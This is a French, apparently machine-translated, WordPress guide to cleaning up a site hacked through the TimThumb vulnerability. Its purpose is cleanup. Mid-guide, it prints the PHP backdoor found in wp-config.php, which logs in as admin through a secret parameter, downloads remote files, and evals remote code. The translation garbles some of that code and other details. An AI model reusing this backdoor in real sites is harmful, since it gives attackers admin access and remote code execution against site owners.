Comment réparer et nettoyer le piratage TimThumb dans WordPress

Donc, si vous vous en souvenez bien, un problème de sécurité lié au script TimThumb d'août a été résolu. Cependant, toujours à notre grande surprise, de nombreux sites utilisent encore l'ancienne version. Nous avons réparé trois sites depuis le mois dernier, l’un étant hier. Il est donc logique de rédiger un article étape par étape pour que nos utilisateurs puissent le suivre. Les trois utilisateurs pour lesquels nous corrigeons ce problème ne savaient même pas ce que TimThumb était ou s'ils l'utilisaient ou non..

TimThumb est un script PHP qui redimensionne les images. Il y avait une vulnérabilité dedans, mais il est sûr d'utiliser maintenant.

Alors, comment savez-vous que votre site est piraté? Si vous voyez un grand écran rouge sur votre navigateur lorsque vous visitez votre site:

Si vous commencez à être bombardé de courriels sur les utilisateurs redirigés de votre site. Très probablement, le cas est que votre site a été victime de cet exploit.

Par mesure de prudence, tout le monde devrait simplement utiliser ce scanner de vulnérabilité Timthumb. Cela vous dira si vous utilisez l'ancienne version de TimThumb. Beaucoup de clubs thématiques ont immédiatement amélioré leur noyau. Donc, ce plugin vérifiera si la nouvelle version sécurisée de Timthumb est installée ou si une version plus ancienne est installée.

Maintenant, si votre site est déjà la proie de cet exploit de Timthumb, voici ce que vous devez faire..

Tout d'abord, vous devez supprimer les fichiers suivants:

/wp-admin/upd.php /wp-content/upd.php

Connectez-vous au panneau d'administration WordPress et réinstallez votre version de WordPress. Nous cherchons spécifiquement à réinstaller ces fichiers:

 /wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js 

Puis ouvrez votre wp-config.php où vous trouverez probablement ce gros code malveillant qui collecte les informations de connexion et les cookies. Ce code sera vers le bas.

 if (isset ($ _GET ['pingnow'])) && isset ($ _GET ['pass'])) if ($ _GET ['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22') si ($ _GET ['pingnow'] == 'login') $ user_login = 'admin'; $ user = get_userdatabylogin ($ user_login); $ user_id = $ user-> ID; wp_set_current_user ($ user_id, $ user_login); wp_set_auth_cookie ($ id_utilisateur); do_action ('wp_login', $ user_login);  if (($ _GET ['pingnow'] == 'exec') && (isset ($ _GET ['fichier']))) $ ch = curl_init ($ _GET ['fichier']); $ fnm = md5 (rand (0,100)). '. php'; $ fp = fopen ($ fnm, "w"); curl_setopt ($ ch, CURLOPT_FILE, $ fp); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); curl_exec ($ ch); curl_close ($ ch); fclose ($ fp); echo "location.href = '$ fnm';";  if (($ _GET ['pingnow'] == 'eval') && (isset ($ _GET ['fichier']))) $ ch = curl_init ($ _GET ['fichier']); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); $ re = curl_exec ($ ch); curl_close ($ ch); eval ($ re);  

Dans le dossier de votre thème, recherchez l'emplacement où le script TimThumb peut stocker les fichiers mis en cache. Ils sont généralement dans cette structure:

 /wp-content/themes/themename/scripts/cache/external_MD5Hash.php /wp-content/themes/themename/temp/cache/external_MD5Hashurther.php 

Supprimez tout ce qui ressemble à ceci. Si vous n'êtes pas sûr de tout, supprimez tout ce qui n'est pas un fichier image..

La prochaine chose à faire est de remplacer timthumb.php par la dernière version disponible à l’adresse http://timthumb.googlecode.com/svn/trunk/timthumb.php.

Maintenant, ce serait une bonne idée de changer vos mots de passe en commençant par vos informations de connexion MySQL par vos informations de connexion WordPress. N'oubliez pas de changer le mot de passe pour MySQL dans wp-config.php ou vous obtiendrez l'écran «Erreur d'établissement de connexion».

Changez les clés secrètes dans votre fichier wp-config.php. Vous pouvez générer une nouvelle clé en accédant au générateur en ligne..

Maintenant vous avez fini. N'oubliez pas de vider tous les plugins de mise en cache des pages. Par mesure de précaution, il est bon d'effacer le cache de votre navigateur ainsi que les cookies.

Pour les développeurs, essayez d’utiliser la fonctionnalité Additional Image Sizes (Autres tailles d’image) de WordPress pour remplacer les fonctionnalités de Timthumb..

Faites-nous savoir si vous avez besoin d'assistance supplémentaire en utilisant notre formulaire de contact..